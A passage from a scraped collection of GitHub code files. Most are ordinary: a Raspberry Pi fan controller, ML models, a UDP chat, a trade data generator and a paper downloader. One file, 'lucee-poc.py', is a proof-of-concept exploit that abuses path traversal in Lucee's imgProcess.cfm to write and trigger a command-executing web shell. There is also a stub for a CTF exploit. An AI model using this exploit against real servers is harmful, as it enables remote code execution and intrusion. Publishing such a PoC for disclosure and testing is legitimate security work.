exit(0)\n\n if command(\"init\"):\n mercantil = Mercantil(int(userInput[1]))\n\n if 
command(\"show\"):\n print(mercantil)\n\n if command(\"chegar\"):\n mercantil.chegar(Pessoa(userInput[1]))\n\n if command(\"chamar\"):\n mercantil.chamar(int(userInput[1]))\n\n if command(\"finalizar\"):\n mercantil.finalizar(int(userInput[1])) \n\n\ndef command(command):\n if (command.__eq__(userInput[0])):\n return True\n \n return False\n\n\nif __name__ == \"__main__\":\n main() ","repo_name":"Macai13/POO-2023.2","sub_path":"Extra/Budega (.py)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26890034767","text":"import logging\nimport signal\nimport sys\nimport time\nimport RPi.GPIO as GPIO\n\nFAN_CURVE = [[40,0], [50,20], [60,50], [70,80]]\n\nclass RollingAverage:\n def __init__(self, size):\n self.max = size\n self.data = []\n\n def append(self, x):\n self.data.append(x)\n\n if len(self.data) > self.max:\n self.data.pop(0)\n\n def average(self):\n if len(self.data) == 0:\n return 0\n\n sum = 0\n for i in self.data:\n sum += i\n\n return sum / len(self.data)\n\nclass FanController:\n def __init__(self, pin, frequency, minSpeed=30, pollingInterval=1):\n self.pollingInterval = pollingInterval\n self.minSpeed = minSpeed\n self.temp = RollingAverage(30)\n self.lastSpeed = 0\n\n self.logger = self._init_logger()\n self.logger.info('Fan Controller instance created')\n self.fan = self._init_gpio(pin, frequency)\n signal.signal(signal.SIGTERM, self._handle_sigterm)\n\n def _init_logger(self):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n stdout_handler = logging.StreamHandler()\n stdout_handler.setLevel(logging.INFO)\n stdout_handler.setFormatter(logging.Formatter('%(levelname)8s | %(message)s'))\n logger.addHandler(stdout_handler)\n return logger\n \n def _init_gpio(self, pin, freq):\n GPIO.setmode(GPIO.BOARD) #set pin numbering system\n GPIO.setup(pin,GPIO.OUT, initial=GPIO.LOW)\n fan = GPIO.PWM(pin, freq)\n return fan\n \n def start(self):\n self.fan.start(30)\n self.logger.info('Fan Controller started')\n try:\n while True:\n self.process()\n time.sleep(self.pollingInterval)\n except KeyboardInterrupt:\n self.logger.warning('Keybord interrupt (SIGINT) received...')\n self.stop()\n\n def process(self):\n itemp = self.getTemperature()\n temp = self.getAverageTemperature()\n speed = self.getSpeed(temp)\n if speed != self.lastSpeed:\n self.fan.ChangeDutyCycle(speed)\n self.lastSpeed = speed\n\n self.logger.debug(f'Temp: {itemp}, Avg Temp: {temp} Speed: {speed}')\n\n def getSpeed(self, temperature):\n speed = 0\n for point in reversed(FAN_CURVE):\n if temperature >= point[0]:\n speed = point[1]\n break\n \n if speed > 0 and speed < self.minSpeed:\n speed = self.minSpeed\n\n return speed\n\n def stop(self):\n self.logger.info('Stopping fan-controller...')\n GPIO.cleanup()\n sys.exit(0)\n\n def _handle_sigterm(self, sig, frame):\n self.logger.warning('SIGTERM received...')\n self.stop()\n\n def getTemperature(self):\n cpuTempFile = open(\"/sys/class/thermal/thermal_zone0/temp\", \"r\")\n cpuTemp = float(cpuTempFile.read()) / 1000\n cpuTempFile.close()\n\n return cpuTemp\n\n def getAverageTemperature(self):\n currentTemp = self.getTemperature()\n self.temp.append(currentTemp)\n return self.temp.average()\n\nif __name__ == '__main__':\n service = FanController(12, 25)\n 
service.start()\n","repo_name":"JMS737/fan-controller","sub_path":"fan-controller.py","file_name":"fan-controller.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"19115843229","text":"\"\"\"empty message\n\nRevision ID: 3b3890df8ee4\nRevises: d782c7f2d484\nCreate Date: 2023-05-26 05:02:18.282865\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3b3890df8ee4'\ndown_revision = 'd782c7f2d484'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('name_of_environment_variable_of_marathon_groups',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=128), nullable=True),\n sa.Column('group_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['group_id'], ['marathon_groups.id'], name=op.f('fk_name_of_environment_variable_of_marathon_groups_group_id_marathon_groups')),\n sa.PrimaryKeyConstraint('id', name=op.f('pk_name_of_environment_variable_of_marathon_groups'))\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('name_of_environment_variable_of_marathon_groups')\n # ### end Alembic commands ###\n","repo_name":"Vladislav-Isakov/control-panel-for-vk-marathons","sub_path":"migrations/versions/3b3890df8ee4_.py","file_name":"3b3890df8ee4_.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"16025902034","text":"import sys, os\nsys.path.append(os.path.dirname(os.path.abspath(__file__))+'/../')\n\n# Others\nfrom ..DSConv2d import DSConv2d\nfrom ..DSConvEngine import DSConvEngine\n\n# PyTorch\nimport torch\nimport torch.nn as nn\nimport torchvision\n\ndef conv3x3(in_planes, out_planes, block_size = 32, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return DSConv2d(in_planes, out_planes, kernel_size=3, block_size=block_size, stride=stride, padding=1, bias=False)\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, block_size=32, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride=stride, block_size=block_size)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes, block_size=block_size)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n return out\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, block_size=32, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = DSConv2d(inplanes, planes, kernel_size=1, block_size=block_size, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2=DSConv2d(planes,planes,kernel_size=3,block_size=block_size,stride=stride,padding=1,bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = DSConv2d(planes, planes*self.expansion, kernel_size=1, block_size=block_size, bias=False)\n self.bn3 = nn.BatchNorm2d(planes*self.expansion)\n self.relu = 
nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out+=residual\n out = self.relu(out)\n\n return out\n\nclass BlockResNet(nn.Module):\n def __init__(self, block, layers, block_size=32, num_classes = 1000):\n self.inplanes = 64\n super(BlockResNet, self).__init__()\n self.conv1 = DSConv2d(3, 64, kernel_size=7, block_size=block_size, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0],block_size=block_size)\n self.layer2 = self._make_layer(block, 128, layers[1],block_size=block_size,stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2],block_size=block_size,stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3],block_size=block_size,stride=2)\n self.avgpool = nn.AvgPool2d(7, stride=1)\n self.fc = nn.Linear(512*block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, DSConv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n nn.init.constant_(m.alpha, 1)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, block_size=32, stride=1):\n downsample = None\n if stride!=1 or self.inplanes !=planes*block.expansion:\n downsample = nn.Sequential(\n DSConv2d(self.inplanes, planes*block.expansion, kernel_size=1, block_size=block_size,stride=stride, bias=False),\n nn.BatchNorm2d(planes*block.expansion),\n )\n layers = []\n layers.append(block(self.inplanes, planes, block_size, stride, downsample))\n self.inplanes = planes*block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, block_size))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n\n return x\n\ndef block_resnet101(pretrained=False, bit_nmb=8, block_size=32, num_classes=1000):\n \"\"\"Constructs a ResNet101 model\n \"\"\"\n\n block_model = BlockResNet(Bottleneck, [3, 4, 23, 3], block_size=block_size, num_classes=num_classes)\n\n if pretrained==True:\n model = torchvision.models.resnet101(pretrained=True)\n eng = DSConvEngine(block_size, bit_nmb)\n block_model = eng(model, block_model)\n\n return block_model\n\ndef block_resnet50(pretrained=False, bit_nmb=8, block_size=32, num_classes=1000):\n \"\"\" Constructs a ResNet50 model\n \"\"\"\n block_model = BlockResNet(Bottleneck, [3, 4, 6, 3], block_size = block_size, num_classes=num_classes)\n if pretrained==True:\n model = torchvision.models.resnet50(pretrained=True)\n eng = DSConvEngine(block_size, bit_nmb)\n model = model.cuda()\n block_model = block_model.cuda()\n block_model = eng(model, block_model)\n return block_model\n\ndef block_resnet34(pretrained=False, bit_nmb=8, block_size=32, num_classes=1000):\n \"\"\" Constructs a ResNet34 model\n \"\"\"\n block_model = BlockResNet(BasicBlock, [3, 4, 6, 3], block_size=block_size, num_classes=num_classes)\n\n if 
pretrained==True:\n model = torchvision.models.resnet34(pretrained=True)\n eng = DSConvEngine(block_size, bit_nmb)\n block_model = eng(model, block_model)\n\n return block_model\n\n","repo_name":"ActiveVisionLab/DSConv","sub_path":"modules/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"45"} +{"seq_id":"38548569940","text":"import string\r\nimport random\r\nimport argparse\r\nimport requests\r\nimport urllib3\r\n#Disable insecure https warnings (for self-signed SSL certificates)\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-t\", \"--target\", default=\"http://localhost:8888\")\r\nargs = ap.parse_args()\r\nbase_url = args.target.rstrip(\"/\")\r\ndef random_string():\r\n return \"\".join(random.choices(string.ascii_lowercase, k=12))\r\npayload = f\"\"\"\\\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    Command:value=\"#form.cmd#\">
    Options: value=\"#form.opts#\">
    Timeout: value=\"#form.timeout#\"\r\n value=\"5\">
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n#HTMLCodeFormat(myVar)#\r\n
    \r\n
    \r\n
    \r\n\"\"\"\r\nwith requests.Session() as session:\r\n img_process_url = f\"{base_url}/lucee/admin/imgProcess.cfm\"\r\n response = session.get(img_process_url)\r\n if response.ok:\r\n print(f\"[-] Target most likely not vulnerable.\")\r\n exit()\r\n filename = random_string() + \".cfm\"\r\n print(filename)\r\n print(f\"[*] Writing payload...\")\r\n session.post(f\"{img_process_url}?file=_/\" + random_string(), data={\"imgSrc\": random_string()})\r\n session.post(f\"{img_process_url}?file=_/../../../context/{filename}\", data={\"imgSrc\": payload})\r\n try:\r\n print(\"[*] Triggering shell...\")\r\n session.get(f\"{base_url}/lucee/{filename}\", timeout=2)\r\n except requests.ReadTimeout:\r\n pass\r\n\r\n\r\n\r\n\r\n","repo_name":"ab0x90/lucee-poc","sub_path":"lucee-poc.py","file_name":"lucee-poc.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"32872540823","text":"import torch\n\nimport numpy as np\n\n#------- LEADING EIGENVECTOR OBJECTIVE\ndef Loss(x, Z):\n x, Z = reshape(x, Z)\n\n A = Z.t().mm(Z)\n n = float(Z.shape[0])\n\n f = - x.t().mm(A.mm(x))\n return f.squeeze() / n\n\ndef Gradient(x, Z, proj=True):\n x, Z = reshape(x, Z)\n n = float(Z.shape[0])\n\n A = Z.t().mm(Z)\n G = - 2. * A.mm(x) / n\n \n if proj:\n return Proj(x, G)\n else:\n return G\n\ndef Lipschitz(Z):\n n = float(Z.shape[0]) \n L = np.zeros(int(n))\n\n for i in range(int(n)):\n L[i] = (Z[i]**2).sum().item()\n\n return L\n\n## LEADING EIGEN\ndef leading_eigenvecor(Z):\n Z = np.asarray(Z)\n np.random.seed(1)\n eigh = np.linalg.eigh(Z.T.dot(Z))\n\n #assert False not in (eigh[0]>0)\n return eigh[1][:, -1]\n\n\n#### - MISC\ndef reshape(x, Z):\n if isinstance(x, np.ndarray):\n x = torch.FloatTensor(x)\n\n if x.dim() == 1:\n x = x.unsqueeze(1) \n if Z.dim() == 1:\n Z = Z.unsqueeze(0)\n\n return x, Z\n\n# Riemannian sphere operations\ndef Exp(x, U):\n U_norm = torch.norm(U)\n \n A = torch.cos(U_norm) * x\n B = torch.sin(U_norm) * U / U_norm\n\n return A + B\n\ndef Retract(A, B):\n return (A + B) / float(torch.norm(A + B))\n\n\ndef Transport(U, x, y):\n return Proj(y, U)\n\ndef Proj(x, H):\n return H - x.t().mm(H) * x\n ","repo_name":"IssamLaradji/MASAGA","sub_path":"loss_eigenvector.py","file_name":"loss_eigenvector.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18587376524","text":"class Solution:\n def fractionToDecimal(self, numerator: int, denominator: int) -> str:\n sign = '-' if numerator != 0 and (numerator < 0) ^ (denominator < 0) else ''\n n, d = abs(numerator), abs(denominator)\n \n q_left_int, r = divmod(n, d)\n \n seen = {}\n q_right_list = []\n index = 0\n while r != 0 and r not in seen:\n seen[r] = index\n q, r = divmod(r * 10, d)\n q_right_list.append(str(q))\n index += 1\n \n q_left = str(q_left_int)\n q_right = ''.join(q_right_list)\n \n if not r: return f\"{sign}{q_left}{'.' 
if q_right else ''}{q_right}\"\n \n i = seen[r]\n return f'{sign}{q_left}.{q_right[:i]}({q_right[i:]})'","repo_name":"Darshan-AS/leetcode_problems","sub_path":"problems/fraction_to_recurring_decimal/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26986479192","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\n\nimport web\nfrom database import *\nfrom output import *\nfrom route import route\n\n@route('/community/section/edit')\nclass CommunitySectionEdit:\n def POST(self):\n input=web.input(name = None, section_id = None)\n session=web.ctx.session\n if not session.has_key('user_id'):\n return output(411)\n if session['user_type']!=0:\n return output(410)\n if input.section_id==None or input.name == None:\n return output(110)\n try:\n input.section_id=int(input.section_id)\n except:\n output(111)\n\n if len(input.name.strip())>20:\n return output(112)\n\n db=getDb()\n result=db.select('section',vars={'section_id':input.section_id},where='section_id=$section_id')\n if len(result)==0:\n return output(465)\n try:\n db.update('section',vars={'section_id':input.section_id},\n where='section_id=$section_id', section_name = input.name)\n return output(200)\n except:\n return output(700)","repo_name":"erha19/base_plateform","sub_path":"sites/admin/community/section/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15646399667","text":"import socket as soc\nimport threading\n\n\nprint(\"\\n --------------------------------------------------------------------- \\n\")\nprint(\"\\t\\t WELCOME TO UDP CHAT FOR WINDOWS \\n\")\nprint(\"\\t\\t Windows 를 위한 UDP 채팅 \\n\")\nprint(\"\\n --------------------------------------------------------------------- \\n\")\n\n# IP 및 포트 번호 지정\nwin_ip = \"127.0.0.1\"\nwin_port = 2222\nmac_ip = \"127.0.0.1\"\nmac_port = 1234\n\n# 소켓 생성 및 IP, 포트 번호 바인딩\nws = soc.socket(soc.AF_INET, soc.SOCK_DGRAM)\nws.bind((win_ip, win_port))\n\n\n# 메세지를 받아오고 상대가 q 혹은 Q 입력 시 오프라인으로 전환했다는 메세지를,\n# 그렇지 않을 시 상대가 전송해온 메세지 내용을 출력하는 메소드\ndef receive():\n while 1:\n # 메세지 받아오기\n msg_rec = ws.recvfrom(1024)\n msg_dec = msg_rec[0].decode()\n # 메세지가 q/Q인지 점검\n if msg_dec == \"q\" or msg_dec == \"Q\":\n msg_mac = \"\\n\\t MAC WENT OFFLINE\"\n return msg_mac\n break\n # 받은 메세지 출력\n msg_mac = \"\\n\\t FROM MAC : \" + msg_dec\n return msg_mac\n\n\n# 보낼 메세지를 입력받고 전송하는 메소드\ndef send():\n while 1:\n # 메세지 입력받기\n msg_send = input(\"YOUR MESSAGE (Q TO QUIT) : \")\n # 메세지 전송\n ws.sendto(msg_send.encode(), (mac_ip, mac_port))\n # 메세지가 q/Q인지 점검, 맞을 시 종료\n if msg_send == \"q\" or msg_send == \"Q\":\n exit(0)\n\n\n# 메세지를 보내기 위한 스레드 선언\nt1 = threading.Thread(target=send)\n\n# 메세지를 받아오기 위한 스레드 선언\nt2 = threading.Thread(target=receive)\n\n# 스레드 구동\nt1.start()\nt2.start()","repo_name":"syngchng/Socket-Programming-Finals","sub_path":"finals/UChat_Windows.py","file_name":"UChat_Windows.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15998369884","text":"from lib.utils import Trade, TradeDetails\r\nimport datetime\r\nimport random\r\n\r\n\r\nclass DataGenerator:\r\n def get_random_dates(self, start_date_str=\"2023-06-01\", end_date_str=\"2023-06-15\", limit=1):\r\n \"\"\"\r\n Generate a list of random dates within a specified range.\r\n\r\n 
Args:\r\n start_date_str (str): The start date in the format \"YYYY-MM-DD\".\r\n end_date_str (str): The end date in the format \"YYYY-MM-DD\".\r\n limit (int): The number of random dates to generate (default: 1).\r\n\r\n Returns:\r\n list: A list of random datetime objects.\r\n\r\n \"\"\"\r\n start_date = datetime.datetime.strptime(start_date_str, \"%Y-%m-%d\")\r\n end_date = datetime.datetime.strptime(end_date_str, \"%Y-%m-%d\")\r\n\r\n dates = []\r\n delta = end_date - start_date\r\n\r\n for _ in range(limit):\r\n random_days = random.randint(0, delta.days)\r\n random_date = start_date + datetime.timedelta(days=random_days)\r\n dates.append(random_date)\r\n\r\n return dates\r\n\r\n def gen_trades(self, start: str = None, end: str = None, assetClass: str = None,\r\n maxPrice: int = None, minPrice: int = None, tradeType: str = None, tradeId: int = None,\r\n trader: str = None, instrumentId=None, counterparty=None, instrumentName: str = None):\r\n \"\"\"\r\n Generate mock trade data.\r\n\r\n Args:\r\n start (str): The start date for generating trade data.\r\n end (str): The end date for generating trade data.\r\n assetClass (str): The asset class of the instrument traded (default: None).\r\n maxPrice (int): The maximum price of the trade (default: None).\r\n minPrice (int): The minimum price of the trade (default: None).\r\n tradeType (str): The type of the trade (default: None).\r\n tradeId (int): The unique ID of the trade (default: None).\r\n trader (str): The name of the trader (default: None).\r\n instrumentId: The ID of the instrument traded (default: None).\r\n counterparty: The counterparty the trade was executed with (default: None).\r\n instrumentName (str): The name of the instrument traded (default: None).\r\n\r\n Returns:\r\n Trade: A Trade object generated with the provided parameters.\r\n\r\n \"\"\"\r\n td = {\r\n \"buySellIndicator\": None,\r\n \"price\": None,\r\n \"quantity\": None\r\n }\r\n\r\n t = {\r\n \"assetClass\": None,\r\n \"counterparty\": None,\r\n \"instrumentId\": None,\r\n \"instrumentName\": None,\r\n \"tradeDateTime\": None,\r\n \"tradeDetails\": None,\r\n \"tradeId\": None,\r\n \"trader\": None\r\n }\r\n\r\n instruments = {\r\n \"AAPL\": \"Apple Inc.\",\r\n \"MSFT\": \"Microsoft Corporation\",\r\n \"AMZN\": \"Amazon.com, Inc.\",\r\n \"GOOGL\": \"Alphabet Inc. 
(Google)\",\r\n \"FB\": \"Facebook, Inc.\",\r\n \"NVDA\": \"NVIDIA Corporation\",\r\n \"TSLA\": \"Tesla, Inc.\",\r\n \"INTC\": \"Intel Corporation\",\r\n \"ADBE\": \"Adobe Inc.\",\r\n \"CRM\": \"Salesforce.com, Inc.\"\r\n }\r\n\r\n traders_name = [\r\n \"John Smith\",\r\n \"Emily Johnson\",\r\n \"Michael Williams\",\r\n \"Sophia Brown\",\r\n \"Daniel Davis\",\r\n \"Olivia Miller\",\r\n \"William Wilson\",\r\n \"Ava Taylor\",\r\n \"James Anderson\",\r\n \"Isabella Martinez\"\r\n ]\r\n\r\n td[\"buySellIndicator\"] = tradeType if tradeType else random.choice([\"BUY\", \"SELL\"])\r\n td[\"price\"] = random.randint(minPrice, maxPrice) if minPrice and maxPrice else random.randint(150, 2500)\r\n td[\"quantity\"] = random.randint(5, 100)\r\n td = TradeDetails(**td)\r\n\r\n t[\"assetClass\"] = assetClass if assetClass else random.choice([\"Bond\", \"Equity\", \"Fixed\"])\r\n t[\"counterparty\"] = counterparty if counterparty else None\r\n t[\"instrumentId\"] = instrumentId if instrumentId else random.choice(list(instruments.keys()))\r\n t[\"instrumentName\"] = instrumentName if instrumentName else instruments[t[\"instrumentId\"]] \\\r\n if t[\"instrumentId\"] in instruments.keys() else t[\"instrumentId\"]\r\n t[\"tradeDateTime\"] = self.get_random_dates(start, end)[0] if start and end else self.get_random_dates()[0]\r\n t[\"tradeDetails\"] = td\r\n t[\"tradeId\"] = tradeId if tradeId else random.randint(1000, 5000)\r\n t[\"trader\"] = trader if trader else random.choice(traders_name)\r\n\r\n return Trade(**t)\r\n","repo_name":"arnavandraskar/Trade-API","sub_path":"datagenerator.py","file_name":"datagenerator.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3758253874","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pyquery import PyQuery as pq\nimport yapbib.biblist as biblist\n\n\nclass IEEE(object):\n\n def __init__(self, id, it=None):\n self.id = id\n if not it is None:\n self.it = it\n\n @property\n def title(self):\n if not hasattr(self, 'it'):\n self.it = self._full_bibtex().get_items()[0]\n return self.it['title']\n\n @staticmethod\n def from_url(url):\n return IEEE(id=id_from_url(url))\n\n @staticmethod\n def from_bibtex_item(it):\n #try:\n #return IEEE(id=id_from_item(it), it=it)\n #except:\n #print(it['title'])\n #raise\n return IEEE(id=id_from_item(it), it=it)\n\n @staticmethod\n def from_bibtex(f):\n b = biblist.BibList()\n ret = b.import_bibtex(f)\n assert ret\n return [IEEE.from_bibtex_item(it) for it in b.get_items()]\n\n def export_bibtex(self, f):\n b = self._full_bibtex()\n b.export_bibtex(f)\n\n def download_pdf(self):\n TEMPLATE = 'http://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=%s'\n url = TEMPLATE % self.id\n content = urlread(url)\n url = pq(content)('frame').eq(1).attr('src')\n content = urlread(url)\n filename = escape(self.title) + '.pdf'\n import os\n if not os.path.exists(filename):\n with open(filename, 'wb') as f:\n f.write(content)\n\n\ndef escape(name):\n from gn import Gn\n gn = Gn()\n return gn(name)\n\n\nimport urllib2\nimport cookielib\ncookies = cookielib.LWPCookieJar()\nhandlers = [\n urllib2.HTTPHandler(),\n urllib2.HTTPSHandler(),\n urllib2.HTTPCookieProcessor(cookies)\n ]\nopener = urllib2.build_opener(*handlers)\n\n\ndef urlread(url):\n hdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n req = urllib2.Request(url, headers=hdr)\n page = opener.open(req)\n return page.read()\n\n\ndef from_clipboard():\n import win32clipboard\n win32clipboard.OpenClipboard()\n data = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n return data\n\n\ndef get_params():\n import sys\n return sys.argv[1] if len(sys.argv) > 1 else from_clipboard()\n\n\ndef download_bibtex(arg):\n bib = IEEE.from_url(arg)\n bib.export_bibtex('out.bib')\n\n\ndef download_pdf(arg):\n import time\n import random\n bibs = IEEE.from_bibtex(arg)\n print('bibs loaded')\n for bib in bibs:\n for i in range(1):\n try:\n print(bib.title)\n bib.download_pdf()\n jump = 60 + random.randint(0, 30)\n print('sleep %d' % jump)\n time.sleep(jump)\n except:\n print('failed')\n else:\n print('done')\n break\n\n\ndef id_from_item(it):\n urls = it['url'].split()\n assert urls\n for url in urls:\n try:\n return id_from_url(url)\n except:\n pass\n assert False\n\n\ndef id_from_url(url):\n from urlparse import urlparse, parse_qs\n word = parse_qs(urlparse(url).query)['arnumber'][0]\n assert word\n return word\n\n\nif __name__ == '__main__':\n arg = get_params()\n if arg.endswith('.bib'):\n download_pdf(arg)\n else:\n download_bibtex(arg)\n","repo_name":"Answeror/pypaper","sub_path":"pypaper/ieee.py","file_name":"ieee.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"11446782346","text":"from pwn import *\ncontext.log_level='debug'\n\nurl = 'alpha.8059blank.ml'\nport = 3000\np = remote(url, port)\n\nbinary = './rps2'\nelf = context.binary = ELF(binary)\n\n'''\nlooks like we have all securities enabled which is fairly annoying\ncouldnt find the vuln until lucas told me it was array oob (havent looked at exploit script yet)\nnever actually done array oob exploit except in an assembly intro course\nhe also said you need to win 5 times so will try to understand how that works\nany BOF will only crash the program at return, which is all the way at the end of main (see source code)\nand the program restarts before that if you dont win more than 5 times\n'''\n\n\n# reminder that this exists\n# win = elf.sym.win\n\n\n\nrop = ROP(elf)\n","repo_name":"absurdtiger/pwn","sub_path":".archive/CCT/hACk22/RPS/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11385189347","text":"import numpy as np\r\n\r\n\r\nclass manualLSTM:\r\n def __init__(self, Wi, Ui, bi, Wc, Uc, bc, Wf, Uf, bf, Wo, Uo, bo, W_out, b_out):\r\n self.Wi = Wi\r\n self.Ui = Ui\r\n self.bi = bi\r\n self.Wc = Wc\r\n self.Uc = Uc\r\n self.bc = bc\r\n self.Wf = Wf\r\n self.Uf = Uf\r\n self.bf = bf\r\n self.Wo = Wo\r\n self.Uo = Uo\r\n self.bo = bo\r\n self.W_out = W_out\r\n self.b_out = b_out\r\n self.ht_1 = None\r\n self.Ct_1 = None\r\n\r\n def sigmoid(self, x):\r\n return 1.0 / (1.0 + np.exp(-x))\r\n\r\n def forward(self, x):\r\n n, hidden_size = x.shape[0], self.Wi.shape[1]\r\n ht_list = []\r\n\r\n if self.ht_1 is None:\r\n self.ht_1 = np.zeros(n * hidden_size).reshape(n, hidden_size)\r\n self.Ct_1 = np.zeros(n * hidden_size).reshape(n, hidden_size)\r\n\r\n for t in np.arange(x.shape[1]):\r\n xt = np.array(x[:, t, 
:])\r\n it = self.sigmoid(\r\n np.dot(xt, self.Wi) + np.dot(self.ht_1, self.Ui) + self.bi\r\n )\r\n Ct_tilda = np.tanh(\r\n np.dot(xt, self.Wc) + np.dot(self.ht_1, self.Uc) + self.bc\r\n )\r\n ft = self.sigmoid(\r\n np.dot(xt, self.Wf) + np.dot(self.ht_1, self.Uf) + self.bf\r\n )\r\n Ct = it * Ct_tilda + ft * self.Ct_1\r\n ot = self.sigmoid(\r\n np.dot(xt, self.Wo) + np.dot(self.ht_1, self.Uo) + self.bo\r\n )\r\n ht = ot * np.tanh(Ct)\r\n ht_list.append(ht)\r\n\r\n self.ht_1 = ht\r\n self.Ct_1 = Ct\r\n\r\n y = np.dot(ht, self.W_out) + self.b_out\r\n return y\r\n","repo_name":"mamoru-gunji/PICO_W_magic_wands","sub_path":"pywin/manualLSTM.py","file_name":"manualLSTM.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"18005058916","text":"# -*- coding:utf-8 -*-\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\nimport numpy as np\nfrom itertools import cycle ##python自带的迭代器模块\n\n\ninput_X = []\nstations_coordinate_file_path = 'sanfrancisco/dataset/flow_data/tmas2012_stations.coordinate'\nwith open(stations_coordinate_file_path) as f:\n for line in f:\n id_lat_lon = line.strip().split(' ')\n lat = float(id_lat_lon[-2])\n lon = float(id_lat_lon[-1])\n input_X.append([lat, lon])\n\nX = np.array(input_X)\n\nbandwidth = estimate_bandwidth(X, quantile=0.5)\n\nms = MeanShift(bandwidth=bandwidth, 